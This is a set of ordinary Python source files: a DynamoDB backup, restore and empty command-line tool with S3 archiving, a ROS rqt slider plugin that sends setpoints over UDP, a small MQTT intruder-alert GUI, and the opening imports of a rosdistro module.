client = boto3.client(service, region_name=aws_region)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile, region, "sts")
dynamo = _get_aws_client(profile, region, "dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator("list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile, region, "s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except botocore.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile, region, "s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except botocore.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except botocore.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
def delete_table(conn, sleep_interval, table_name):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be indesired state
"""
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(table_name,
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
scanned_table = dynamo.scan(table_name,
exclusive_start_key=last_evaluated_key)
except ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
while True:
try:
dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
else:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(destination_table,
global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if (e.body["__type"] ==
"com.amazonaws.dynamodb.v20120810#LimitExceededException"):
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif (e.body["__type"] ==
"com.amazon.coral.availability#ThrottlingException"):
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
host=args.host,
port=int(args.port),
is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
kwargs={"tableQueue": q})
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
my_module.py
|
import os
import rospy
import rospkg
from python_qt_binding import QT_BINDING
import sys
from python_qt_binding.QtCore import qDebug
from qt_gui.plugin import Plugin
from python_qt_binding import loadUi
from python_qt_binding.QtWidgets import QWidget, QSlider
from python_qt_binding.QtCore import QObject
# import socket programming library
import socket, select
import matplotlib
# import thread module
from _thread import *
import threading
from struct import *
class MyPlugin(Plugin):
target_pos = []
target_force = []
s = []
s_cmd = []
port = 8002 # where do you expect to get a msg?
bufferSize = 12 # whatever you need
server_thread = []
client_address = ('192.168.0.102', 8000)
def __init__(self, context):
super(MyPlugin, self).__init__(context)
# Give QObjects reasonable names
self.setObjectName('MyPlugin')
# Process standalone plugin command-line arguments
from argparse import ArgumentParser
parser = ArgumentParser()
# Add argument(s) to the parser.
parser.add_argument("-q", "--quiet", action="store_true",
dest="quiet",
help="Put plugin in silent mode")
args, unknowns = parser.parse_known_args(context.argv())
if not args.quiet:
print 'arguments: ', args
print 'unknowns: ', unknowns
# Create QWidget
self._widget = QWidget()
# Get path to UI file which should be in the "resource" folder of this package
ui_file = os.path.join(rospkg.RosPack().get_path('m3_rqt'), 'resource', 'MyPlugin.ui')
# Extend the widget with all attributes and children from UI file
loadUi(ui_file, self._widget)
# Give QObjects reasonable names
self._widget.setObjectName('M3')
# Show _widget.windowTitle on left-top of each plugin (when
# it's set in _widget). This is useful when you open multiple
# plugins at once. Also if you open multiple instances of your
# plugin at once, these lines add number to make it easy to
# tell from pane to pane.
if context.serial_number() > 1:
self._widget.setWindowTitle(self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# Add widget to the user interface
context.add_widget(self._widget)
self.target_pos = self._widget.findChild(QSlider, "target_pos")
self.target_force = self._widget.findChild(QSlider, "target_force")
self.target_pos.valueChanged.connect(self.pos_target_change)
self.target_force.valueChanged.connect(self.force_target_change)
import select, socket
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('255.255.255.255', self.port))
self.s.setblocking(0)
self.server_thread = threading.Thread(target=self.receiveStatus)
self.server_thread.daemon = True
self.server_thread.start()
self.s_cmd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# thread fuction
def receiveStatus(self):
while not rospy.is_shutdown():
result = select.select([self.s],[],[])
msg = result[0][0].recv(self.bufferSize)
print(unpack('fff',msg))
def shutdown_plugin(self):
# TODO unregister all publishers here
pass
def save_settings(self, plugin_settings, instance_settings):
# TODO save intrinsic configuration, usually using:
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO restore intrinsic configuration, usually using:
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# Comment in to signal that the plugin has a way to configure
# This will enable a setting button (gear icon) in each dock widget title bar
# Usually used to open a modal configuration dialog
def pos_target_change(self):
setpoint = self.target_pos.value()
print(setpoint)
self.s_cmd.sendto(pack('fB', setpoint,0),self.client_address)
def force_target_change(self):
setpoint = self.target_force.value()
print(setpoint)
self.s_cmd.sendto(pack('fB', setpoint,1),self.client_address)
|
sub_thread.py
|
import paho.mqtt.subscribe as sub
from guizero import *
import threading
app=App(title="harini")
label1 = Text(app,text ="Intruder Dectection")
textb = TextBox(app)
textb.resize(200,20)
textb.disable()
intruder = Picture(app, image="intr.jpg")
intruder.resize(350,400)
def recv():
while(True):
msg = sub.simple("pir_channel", hostname="localhost")
#textb.clear()
inMess = msg.payload.decode()
textb.set(inMess)
print(inMess)
t1 = threading.Thread(target=recv)
t1.start()
app.display()
|
rosdistro.py
|
import copy
import os
import sys
import tarfile
import tempfile
import threading
try:
from urllib.request import urlopen
